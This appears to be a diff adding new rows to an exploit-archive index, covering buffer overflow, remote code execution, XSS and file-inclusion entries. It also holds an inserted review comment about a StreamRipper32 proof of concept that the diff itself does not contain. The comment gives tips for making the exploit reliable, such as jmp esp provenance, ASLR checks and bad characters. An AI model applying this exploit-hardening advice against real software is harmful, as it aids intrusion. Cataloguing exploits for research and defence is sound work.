diff --git a/files_exploits.csv b/files_exploits.csv
index 8d75cda34..a751d0aa2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
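Review bot: The overwritten return address `b"\x47\x23\x30\x74" #74302347` has no provenance — the comment records the value but not the module it lives in or the instruction it points at (presumably a `jmp esp`/`call esp` in a DLL shipped with StreamRipper32), so a reader cannot tell whether it is ASLR/rebase-free and will survive a reboot or another Windows build; `# 0x74302347 : jmp esp in <module>.dll (no ASLR, no rebase)` with the real module name would make the PoC reproducible. The reproduction step "paste the output in SongPattern" is hard to follow for a file written in `'wb'` mode with raw bytes: say how the bytes are meant to be transferred into the GUI field and whether the listed bad characters `\x00\x0A\x0D` were confirmed for that field. Minor: `with open('exploit.txt', 'wb') as file: file.write(buf)` replaces the open/close pair and closes the handle on error.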
@@ -11082,6 +11082,7 @@ id,file,description,date,author,type,platform,port
 48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
 48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
+48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42742,3 +42743,8 @@ id,file,description,date,author,type,platform,port
 48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
 48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php,
 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,
+48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution",2020-05-26,"Musyoka Ian",webapps,php,
+48516,exploits/php/webapps/48516.txt,"Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)",2020-05-26,"Kamaljeet Kumar",webapps,php,
+48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php,
+48519,exploits/linux/webapps/48519.py,"Pi-hole 4.4.0 - Remote Code Execution (Authenticated)",2020-05-26,Photubias,webapps,linux,
+48520,exploits/php/webapps/48520.txt,"WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution",2020-05-26,"Austin Martin",webapps,php,